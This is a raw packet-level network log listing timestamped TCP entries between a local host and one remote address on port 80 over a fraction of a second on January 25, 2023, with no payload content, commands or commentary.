Jan 25, 2023 09:28:21.161299944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161444902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161464930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161504030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.172676086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172717094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172744989 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.172770023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172796965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172827005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172837973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.172863960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172895908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172904015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.172929049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172943115 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.172967911 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.172992945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173017025 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173041105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173063993 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173074961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173099995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173125029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173151970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173167944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173194885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173206091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173229933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173254013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173281908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173290968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173316956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173332930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173356056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173382044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173408985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173424006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173449039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173479080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173489094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173512936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173526049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173548937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173576117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173604965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173614979 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173638105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173650026 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173674107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173698902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173726082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173738956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173764944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173791885 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173804045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173829079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173849106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173866987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173903942 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173926115 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.173949957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.173974991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174006939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174103975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174129009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174161911 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174226046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174252033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174276114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174295902 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174315929 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174329996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174354076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174380064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174406052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174423933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174443960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174455881 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174554110 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174578905 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174602985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174618959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174643040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174660921 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174679041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174719095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174743891 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174757004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174781084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174793005 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174817085 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174841881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174860954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174876928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174907923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174937010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174946070 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.174969912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.174982071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175005913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175030947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175049067 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175067902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175091982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175110102 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175128937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175153017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175183058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175208092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175232887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175251007 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175479889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175507069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175528049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175548077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175574064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175600052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175614119 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175637960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175649881 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175673008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175698042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175724030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175735950 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175760984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175772905 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175796986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175822020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175851107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175862074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175887108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175915003 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175924063 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175949097 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.175961018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.175983906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176011086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176028013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176048040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176074028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176100016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176111937 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176136971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176150084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176465034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176491976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176517010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176539898 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176554918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176568985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176594019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176620007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176664114 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176678896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176703930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176719904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176739931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176764011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176789045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176804066 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176825047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176856041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176867008 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176896095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176904917 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176928043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176953077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.176971912 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.176991940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177016020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177038908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177053928 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177076101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177088976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177110910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177136898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177156925 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177174091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177197933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177222013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177237988 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177263975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177273035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177295923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177320957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177350998 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177617073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177643061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177674055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177684069 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177707911 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177735090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177746058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177769899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177783012 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177807093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177831888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177858114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177876949 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177897930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177910089 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.177933931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177958965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177984953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.177998066 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178021908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178047895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178064108 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178083897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178097010 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178118944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178143978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178160906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178180933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178205967 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178231001 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178242922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178270102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178287029 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178571939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178599119 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178637981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178656101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178682089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178705931 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178731918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178759098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178785086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178800106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178823948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178847075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178860903 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178884983 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178896904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178920031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178946018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.178961039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.178982973 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179008961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179034948 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179045916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179073095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179090977 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179111958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179136038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179160118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179171085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179194927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179207087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179229021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179255009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179299116 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179537058 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179565907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179590940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179610968 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179627895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179642916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179667950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179692984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179721117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179744959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179758072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179769039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179791927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179816961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179831982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179852009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179879904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179905891 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179928064 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179944038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.179955959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.179977894 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180005074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180022955 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180046082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180071115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180089951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180109024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180135012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180151939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180172920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180198908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180232048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180495024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180521011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180547953 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180562019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180588007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180613041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180624962 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180649042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180661917 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180685997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180712938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180732965 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180752039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180778027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180803061 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180814028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180840969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180865049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180877924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180905104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180929899 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.180942059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180967093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.180995941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181005001 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181026936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181040049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181063890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181090117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181113958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181132078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181150913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181189060 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181453943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181473970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181492090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181515932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181523085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181540966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181550980 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181567907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181593895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181684017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181703091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181721926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181740999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181751013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181767941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181781054 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181796074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181811094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181824923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181843996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181863070 CET	80	49736	188.114.96.3	192.168.2.4
